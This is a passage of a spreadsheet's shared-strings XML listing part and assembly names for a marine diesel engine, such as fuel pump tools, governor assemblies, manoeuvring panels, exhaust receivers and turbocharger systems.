    <t>Hydr.jack, Fuel pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING TOOL F.FUEL PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL F.SCRAPER RING MOUNT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.TOOL-FUEL PUMP HOUS.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FOOT FOR LIFTING TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL-P.MAX RACK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTRACT.TOOL-SUCT.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL,TIGHTN.PUNCTUREVALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PULLING TOOL,VIT RACK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REAMER-FUEL PUMP HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALS TOOL, PLUNGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALS TOOL, TOP COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS FOR MS-136</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF PRESS.GAUGE PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE W.PNEUMATIC COMP.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF EL.MECH.INTERL..</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF EL.MECH.INTERL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SIDE PANEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF SWITCHES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARRANGEMENT OF LAMPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF COMPARATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MIMIC DIAGRAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MANOEUVRING PANEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALARM SLOW DOWN PANEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPEED SETTING UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PANEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLOW DOWN SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WRONG WAY INTERLOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHANGE-OVER VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SOLENOID FOR INTERLOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALARM VISUAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AHEAD-ASTERN INDICATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PILOT LAMPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESS.GAUGE &amp; THERMOMETER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FILTER UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>POWER SUPPLY UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRINT PLUG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SOCKET FOR R-I CONVERTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>R-I CONVERTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INDEX INDICATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>END STO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE 3-WAY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAFETY CONTROL SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OVERSPEED PROTECTION SYST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>I/P CONVERTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EMERGENCY RUNNING BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TACHO SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TACHO PICK-UPS FOR EL-GOV</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TACHO PICK-UP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE INTERFACE UNIT ARR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF WIRING ON ENGINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOCATION OF CONTROL BOXES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WIRING, ELECTRONICS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instrumentation, Electronics</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ME Simulator assembly</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ME-B Simulator assembly</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EL.DIAGRAM MANOEV.CONSOLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WRONG WAY PANEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EL.PANEL AUX.BLOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EL.DIAGRAM CYL.LUBRICATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL SYSTEM FOR TCS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL SYST. T/C CUT-OUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL SYST. T/C BY-PASS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRIDGE CONTROL EQUIPMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRIDGE CONTR.REQUIREMENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRIM.FUEL OIL PUMP MOUNT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING-WELDED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPLIT COUPLING COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF LEVERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PULL ROD COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LEVER AND PULL ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PREP.F.MONITORING EQUIPM.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PREPARATION FOR PMI SYST.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MACHINING-PROTECTIVE TUBE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECT.BOX, TRAVEL SENS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF SCUFFING EQUIPMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TACHO SYSTEM F.INTERM.LUB</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder wear monitoring system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bearing wear monitoring system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bearing wear monitoring Assy</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLES F.MONITORING EQUIP.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PREPARATION FOR MIP SYST.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF SENSOR ADAPTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHUT-OFF VALVE (HP F.O.)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF SHUT-OFF VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MIP EQUIPMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARMHOLDER COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING LOADED PULL ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING LOADED LEVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MONT. OF PNEUMATICAL CYL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE WELDING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INDEX AND OVERSPEED ARR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>P.G.GOVERNOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOOSTER FOR GOVERNOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ELECTRICAL GOV.ACTUATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EQUIPMENT FOR EL.GOVERNOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL UNIT, CYL.CUT-OUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LEVERS ON GOVERNOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF PUMP GROUP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GOVERNOR AND DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF PRESSURE GAUGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF GOVERNOR DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET WITH GOVERNOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF GOV.+AMPLIFIER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.OF EL.GOVERNOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PAWL ARM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GOVERNOR DRIVE MOUNTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF EL.GOVERNOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE FOR OVERSPEED TRIP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT. OF PNEUMATICAL CYL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>M. OF OVERSP. &amp; PNEU. CYL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WOODWARD ARM.      145227</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPEED CONTROL SYSTEM EGB</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT. OF PNEUM. CYL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL LIMITING CYLINDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PARTS LIST-PIPE ARR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTR.EQ.WITHOUT BR.CONTR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL EQ.WITH BR.CONTR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF CONTROL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONN.OF JET-ASSISTANCE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAN.SYSTEM-CONVERSION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF MANOEU. SYS. UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF VIT CONTROL UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLING OF MANOE.SYS.UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF GEARBOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mount. of governor drive</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.OF AIR RECEIVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PARTS LIST-AIR RECEIVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PARTS LIST-PRESS.CONTROL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAN.VALVE EMERG. BRACKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF SLIDING SLEEVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF VALVES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF INDUCTION SENSOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GEAR BOX WITH BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GEAR BOX WITH GENERATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE FOR HYDRAULICS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF EMERGENCY CONSOLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PARTS LIST-SECTOR BRACKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF AIR POSITIONER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF VALVES+SWITCHES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF SHUTDOWN DEVICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arr. of valves</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF PICK-UPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF PRESSURE CONVERTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF MAX.STOP SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF OIL TANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF ACCUMULATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLOCKING OF ST.AIR DISTR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHUT-OFF COCK WITH SWITCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLOCKING OF ACTUATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT.OF EL.BOX EMG.CONS.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HUB WITH ARMS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clamping arm welding</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLAMPING ARM COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THROTTLE SCREW SECURING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ELECTRICAL GENERATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>POTENTIOMETER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MULTI-WAY VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIRECTION FINDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF MECH. TACHOMETER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EL.COPM.,MANOEUVR.SYST.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIST OF COMPONENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TC CUT OFF CONTROL SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPARE PARTS MANOEUV.SYST.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STOP PISTON VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOP COVER WITH PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF STARTING SLIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STARTING SLIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROCKER PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOCK FOR HAND WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WRENCH FOR STARTING SLIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLIDE COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER F. ST. AIR SLIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT.OF START. AIR SLIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>POSITION INDICATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket, pos. indicator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TCS/PTI SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO/PTI SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO/RCF SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF TC DUCTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TC-Cut out system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ORDER LIST-POWER TURBINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ORDER LIST-TCS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VARIOUS PIPES-TCS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRESHW. PIPES-POWER TURB.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRY CLEANING TCS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST PIPES-TCS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST PIPE-TCS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT EXH. PIPE TCS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TCS CONTROL PANEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUMENTS-TCS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONN. PIECE W/INDICATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INDICATOR COCK-DETAIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PARTS LIST-CHAIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN WH.F.COUNTERWEIGHTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL, MOMEMT COMPENSATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Scav. Air Arrangement</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCAV.AIR REC. PLATES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NOSE FOR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALT. OF SCAV.AIR RECEIVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ORIFICE ARR. SCAV.AIR REC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INLET FOR AUX.BLOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STOP SPRING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SOUND INSULATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Charging air cooling pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Charging air cooling Unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MEASURING PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUCTION CAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF EMERGENCY BLOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DELIVERY PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUCTION PIPE, T-PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.OF SUCTION PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCAV. AIR REC.+PIPES REAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION-COOLER FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION-SCAV.AIR REC.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEND-TURBOCHARGER-BOLTED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLDER WITH GRID-BOLTED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLDER WITH GRID-CLAMPED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PARTS LIST-OUTLET PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHELL F EXHAUST RECEIVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION OF TC. INLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE STUB WITH FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION AT GRID</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.OF EXHAUST RECEIVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAFETY HOOP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT FOR EXHAUST PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME FOR EXHAUST PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.BRACING FOR EXH.REC.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PULSECONVERTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST RECEIVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.OF INSULATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MANHOLE COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLOW GUN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WATER WASH OF T.C.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXH.REC.,EMERG.BY-PASS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST RECEIVER,TCS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXH.REC.BY-PASS(INSULAT.)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACING TC AND EXH.PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TRANSITION PIECE F. EXH.P</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.OF EXH.RECEIVER FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.OF EXH.RECEIVER AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSSBAR-LIFT.OF EXH.REC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF DIESEL GEN.EXHAUST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>END COVER AFT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST PIPE 2A-B5</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST PIPE 5B,A4</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST PIPE 6B,A3</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST PIPE 3A,B4</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST PIPE 4A,B3</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST PIPE 5A,B2</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST PIPE 6A,B1</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST PIPE INTERMEDIATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF BYPASS OF TC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE FOR BY-PASS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BALANCING ARR.-FORE+AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.OF FORE END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF FORE END, WITH PTO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL FEED UNIT - COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL FEED UNIT-PIPES COMPL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL FEED UNIT-PIPECOMPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD FOR PTO-SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
